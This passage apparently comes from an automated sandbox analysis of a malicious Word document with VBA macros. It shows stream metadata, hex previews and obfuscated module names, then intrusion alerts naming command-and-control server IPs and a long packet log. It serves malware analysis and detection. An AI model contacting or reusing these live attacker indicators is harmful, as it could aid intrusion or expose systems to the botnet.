Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 ec 00 00 00 05 00 00 00 70 00 00 00 06 00 00 00 78 00 00 00 11 00 00 00 80 00 00 00 17 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 10 00 00 00 98 00 00 00 13 00 00 00 a0 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 448

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	448
Entropy:	3.46647630871
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 90 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 60 01 00 00 03 00 00 00 98 00 00 00 04 00 00 00 44 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 c8 00 00 00 09 00 00 00 d4 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6885

General
Stream Path:	1Table
File Type:	data
Stream Size:	6885
Entropy:	6.02650234948
Base64 Encoded:	True
Data ASCII:	j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 520

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	520
Entropy:	5.52447471798
Base64 Encoded:	True
Data ASCII:	I D = " { B 3 1 5 C D 8 3 - A E F A - 4 B 0 A - 9 9 4 6 - 6 3 1 D 4 8 9 C 2 2 F 0 } " . . D o c u m e n t = A 5 a t e 7 3 k c 6 c w 5 n j y / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z c f 1 k k 3 t 2 s s v 4 r 0 7 m . . M o d u l e = G u s c a 9 5 l u q _ . . E x e N a m e 3 2 = " J v k 5 9 3 o d o w j q u y o o " . . N a m e = " m x " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A F A D 4 6 4 D F A F 3 D 1 F 7 D 1 F 7 D 1 F 7 D 1 F 7 "
Data Raw:	49 44 3d 22 7b 42 33 31 35 43 44 38 33 2d 41 45 46 41 2d 34 42 30 41 2d 39 39 34 36 2d 36 33 31 44 34 38 39 43 32 32 46 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 41 35 61 74 65 37 33 6b 63 36 63 77 35 6e 6a 79 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 63 66 31 6b 6b 33 74 32 73 73 76 34 72 30 37 6d 0d 0a 4d 6f 64 75 6c 65 3d 47 75 73 63 61 39 35 6c 75 71 5f 0d

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 143

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	143
Entropy:	3.86963281051
Base64 Encoded:	False
Data ASCII:	A 5 a t e 7 3 k c 6 c w 5 n j y . A . 5 . a . t . e . 7 . 3 . k . c . 6 . c . w . 5 . n . j . y . . . Z c f 1 k k 3 t 2 s s v 4 r 0 7 m . Z . c . f . 1 . k . k . 3 . t . 2 . s . s . v . 4 . r . 0 . 7 . m . . . G u s c a 9 5 l u q _ . G . u . s . c . a . 9 . 5 . l . u . q . _ . . . . .
Data Raw:	41 35 61 74 65 37 33 6b 63 36 63 77 35 6e 6a 79 00 41 00 35 00 61 00 74 00 65 00 37 00 33 00 6b 00 63 00 36 00 63 00 77 00 35 00 6e 00 6a 00 79 00 00 00 5a 63 66 31 6b 6b 33 74 32 73 73 76 34 72 30 37 6d 00 5a 00 63 00 66 00 31 00 6b 00 6b 00 33 00 74 00 32 00 73 00 73 00 76 00 34 00 72 00 30 00 37 00 6d 00 00 00 47 75 73 63 61 39 35 6c 75 71 5f 00 47 00 75 00 73 00 63 00 61 00 39

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4837

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	4837
Entropy:	5.51877025189
Base64 Encoded:	True
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

Stream Path: Macros/VBA/dir, File Type: WE32000 COFF executable not stripped N/A on 3b2/300 w/paging - version 18435, Stream Size: 628

General
Stream Path:	Macros/VBA/dir
File Type:	WE32000 COFF executable not stripped N/A on 3b2/300 w/paging - version 18435
Stream Size:	628
Entropy:	6.34127378287
Base64 Encoded:	True
Data ASCII:	. p . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . Y m . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . O f f i c . . E O . f . . i . c 5 . E . . . . . . . E 2 D . F 8 D 0 4 C - 5 . B F A - 1 0 1 B -
Data Raw:	01 70 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 59 6d fe 61 1a 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d

Stream Path: WordDocument, File Type: data, Stream Size: 129150

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	129150
Entropy:	7.03372694627
Base64 Encoded:	True
Data ASCII:	. . . . _ . . . . . . . . . . . . . . . . . . . . . . . % . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5f c0 09 04 00 00 f1 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 25 9b 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e f8 01 00 62 7f 00 00 62 7f 00 00 25 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Stream Path: office, File Type: data, Stream Size: 796

General
Stream Path:	office
File Type:	data
Stream Size:	796
Entropy:	7.73402004362
Base64 Encoded:	False
Data ASCII:	. ~ . . . . . . 0 . . . . . a . Q . . . . u N . . . . . @ . l . Y . . . . . . . l . . . . . . . , y 0 p . . . . / . . . . . . { . . . . f . . . h . e _ . . . . . Q . . . . + . \\ . [ 3 . . . . . z . . > . H U . t . . P J . { . . ^ . M . . . ^ . . p { r . \\ . . . . . . . . . < . . . . S . . . ! . . 9 ? . . 1 6 9 . . . ` . . G w . . . . . u . . . . . K . . . . P . . . . . . . . . . 1 b . . G . . L . / ) . 9 . - . . n . . . M > . . . . . . . . . . . . . x e \| . . N . l & . t . k . . + . . E . # . . I . . . O .
Data Raw:	05 7e 92 a5 9d 13 9e 08 30 1e 99 01 10 eb 61 9c 51 88 d9 d2 03 75 4e cf e3 8a 00 be 40 b5 6c 0e 59 06 85 8a f6 95 1f 0e 6c a3 f6 9a 1f e6 d5 ae 2c 79 30 70 e3 b5 a9 8f 2f c2 c1 13 13 df c7 7b b2 8a a8 09 66 d6 a6 bb 68 cb 65 5f 7f b3 af fd b4 51 92 c7 84 fb 2b a3 5c f5 5b 33 d4 0c fa 8c db 7a e8 95 3e cb 48 55 d2 74 07 17 50 4a 10 7b 12 c4 5e c1 4d 00 f7 b6 5e 05 ac 70 7b 72 e7 5c

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/27/21-00:10:36.195998	TCP	2404344	ET CNC Feodo Tracker Reported CnC Server TCP group 23	49166	80	192.168.2.22	84.232.229.24
01/27/21-00:10:41.493772	TCP	2404334	ET CNC Feodo Tracker Reported CnC Server TCP group 18	49167	8080	192.168.2.22	51.255.203.164
01/27/21-00:11:29.811025	TCP	2404328	ET CNC Feodo Tracker Reported CnC Server TCP group 15	49169	8080	192.168.2.22	217.160.169.110
01/27/21-00:11:38.674494	TCP	2404314	ET CNC Feodo Tracker Reported CnC Server TCP group 8	49171	80	192.168.2.22	185.183.16.47

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 00:10:16.314656019 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:16.476891041 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:16.477027893 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:16.480067015 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:16.694104910 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.046556950 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.046624899 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.046668053 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.046719074 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.046763897 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.046821117 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.046843052 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.046880007 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.046947956 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.046996117 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.047039986 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.047100067 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.047122002 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.047190905 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.047261953 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.208486080 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.208535910 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.208565950 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.208600044 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.208625078 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.208657026 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.208705902 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.208729982 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.208746910 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.208802938 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.208851099 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.208884001 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.208920956 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.208969116 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.208990097 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.209033966 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.209080935 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.209108114 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.209140062 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.209183931 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.209208012 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.209249973 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.209297895 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.209316015 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.209351063 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.209417105 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.209444046 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.209492922 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.209539890 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.209558964 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.209613085 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.209678888 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.371500969 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.371643066 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.371736050 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.371778965 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.371905088 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.371989965 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.372049093 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.373841047 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.373898983 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.373945951 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.532882929 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.532947063 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.532977104 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.533008099 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.533046007 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.533088923 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.533128977 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.533180952 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.533231974 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.533247948 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.533271074 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.533317089 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.533355951 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.533411980 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.533420086 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.533499002 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.534883976 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.534943104 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.534984112 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.535026073 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.535057068 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.535074949 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.535118103 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.535164118 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.535202980 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.535243988 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.535264969 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.535273075 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.539453983 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.539515018 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.539557934 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.539585114 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.539629936 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.539658070 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.694390059 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.694458008 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.694514990 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.694574118 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.694612980 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.694660902 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.694700956 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.694746971 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.694803953 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.694828987 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.694889069 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.694945097 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.695004940 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.695030928 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.695084095 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.695111036 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.695168972 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.695229053 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.695250988 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.695316076 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.695331097 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.695403099 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.695427895 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.695473909 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.695508003 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.695564985 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.695601940 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.695650101 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.695708036 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.695730925 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.695785999 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.695843935 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.695867062 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.695915937 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.695970058 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.696005106 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.696052074 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.696115971 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.696141005 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.696197987 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.696257114 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.696280003 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.696329117 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.696384907 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.696436882 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.696470022 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.696528912 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.696564913 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.696616888 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.696674109 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.696696997 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.696753025 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.696815014 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.696841002 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.696906090 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.696964025 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.696986914 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.697042942 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.697097063 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.697120905 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.697175980 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.697264910 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.700445890 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.700510979 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.700567961 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.700623035 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.700661898 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.700721979 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.700747013 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.700804949 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.700887918 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.701144934 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.858710051 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.858763933 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.858803988 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.858851910 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.858882904 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.858930111 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.858947039 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.858989954 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.859030008 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.859065056 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.859086037 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.859122992 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.859150887 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.859179020 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.859219074 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.859235048 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.859273911 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.859311104 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.859328032 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.859791994 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.859867096 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.859936953 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.860213995 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.860255003 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.860286951 CET	49165	80	192.168.2.22	192.169.223.13
